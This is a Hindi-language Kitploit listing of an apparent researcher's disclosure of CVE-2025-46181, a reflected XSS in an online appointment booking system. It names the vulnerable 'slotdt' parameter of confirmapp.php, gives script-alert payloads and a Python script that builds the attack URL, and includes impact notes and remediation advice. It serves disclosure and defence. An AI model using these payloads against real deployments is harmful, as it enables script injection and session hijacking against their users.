Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-46181-XSS — रिफ्लेक्टेड XSS कमजोरी का खुलासा PoC स्क्रिप्ट और एक ऑनलाइन अपॉइंटमेंट बुकिंग सिस्टम के लिए सुधार मार्गदर्शन के साथ। इसमें कमजोर पैरामीटर विश्लेषण और प्रभाव मूल्यांकन शामिल है। | Kitploit
उपकरण/GitHubGitHub/shemkumar/cve-2025-46181-xss
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणवेब सुरक्षापेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubshemkumar/cve-2025-46181-xss

CVE-2025-46181-XSS

रिफ्लेक्टेड XSS कमजोरी का खुलासा PoC स्क्रिप्ट और एक ऑनलाइन अपॉइंटमेंट बुकिंग सिस्टम के लिए सुधार मार्गदर्शन के साथ। इसमें कमजोर पैरामीटर विश्लेषण और प्रभाव मूल्यांकन शामिल है।

रिपॉजिटरी देखें
1 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-46181 - ऑनलाइन अपॉइंटमेंट बुकिंग सिस्टम में रिफ्लेक्टेड XSS

CVE-ID: CVE-2025-46181
द्वारा खोजा गया: Shemkumar P (shemkumar.github.io)
भेद्यता प्रकार: रिफ्लेक्टेड क्रॉस-साइट स्क्रिप्टिंग (XSS)
गंभीरता: मध्यम
स्थिति: खुलासा, MITRE द्वारा CVE असाइन किया गया


✨ विवरण

एक रिफ्लेक्टेड क्रॉस-साइट स्क्रिप्टिंग (XSS) भेद्यता एक सार्वजनिक ऑनलाइन अपॉइंटमेंट बुकिंग सिस्टम (v1.0) में मौजूद है, विशेष रूप से उस पेज में जो अपॉइंटमेंट पुष्टिकरण को संभालता है। एक GET पैरामीटर इनपुट को ठीक से सैनिटाइज़ करने में विफल रहता है, जिससे पीड़ित के ब्राउज़र में जावास्क्रिप्ट इंजेक्शन और कोड निष्पादन संभव हो जाता है।


📍 भेद्य पैरामीटर

root@kitploit:~
GET /confirmapp.php?slotdt=<payload>

उदाहरण पेलोड (एन्कोडेड):

root@kitploit:~
<script>alert("XSS")</script>

💥 प्रूफ ऑफ कॉन्सेप्ट (PoC)

root@kitploit:~
<script>alert("You have been hijacked")</script>

🚫 नैतिक कारणों से लाइव लिंक को हटा दिया गया है। इस भेद्यता का परीक्षण नियंत्रित वातावरण में किया गया था।


⚙️ पायथन PoC स्क्रिप्ट

root@kitploit:~
import requests
from urllib.parse import quote

base_url = "https://[REDACTED]/confirmapp.php"
payload = '<script>alert("XSS triggered")</script>'

params = {
    'fullname': 'test',
    'mobile': '9999999999',
    'emailid': '[email protected]',
    'slotdt': payload,
    'slottime': '11:00:00',
    'doctorid': '2'
}

encoded = '&'.join(f"{k}={quote(str(v))}" for k, v in params.items())
print("Test URL (use only in authorized test environments):")
print(f"{base_url}?{encoded}")

🛡️ प्रभाव

  • मनमाना जावास्क्रिप्ट निष्पादन
  • संभावित सत्र अपहरण
  • क्लिकजैकिंग या फिशिंग रीडायरेक्शन
  • तैयार किए गए लिंक के माध्यम से लक्षित हमले

🧪 उपचार

एप्लिकेशन को चाहिए:

  • PHP में htmlspecialchars() का उपयोग करके उपयोगकर्ता इनपुट को एस्केप करें
  • सामग्री सुरक्षा नीति (CSP) का उपयोग करें
  • क्लाइंट और सर्वर दोनों पक्षों पर उपयोगकर्ता डेटा को सैनिटाइज़ करें

📜 समयरेखा

  • खोजा गया: मई 2025
  • MITRE द्वारा CVE असाइन: जून 2025
  • सार्वजनिक रिलीज़: जून 2025

🧑‍💻 लेखक

Shemkumar P
🕸️ shemkumar.github.io
🔐 साइबर सुरक्षा शोधकर्ता | CTF उत्साही | CVE रिपोर्टर


⚠️ यह प्रकाशन केवल शैक्षिक और रक्षात्मक उपयोग के लिए है। उन सिस्टमों पर भेद्यताओं का परीक्षण या शोषण करना जिनके आप मालिक नहीं हैं या जिनके लिए आपके पास स्पष्ट अनुमति नहीं है, अवैध और अनैतिक है।

टूल डाउनलोड करें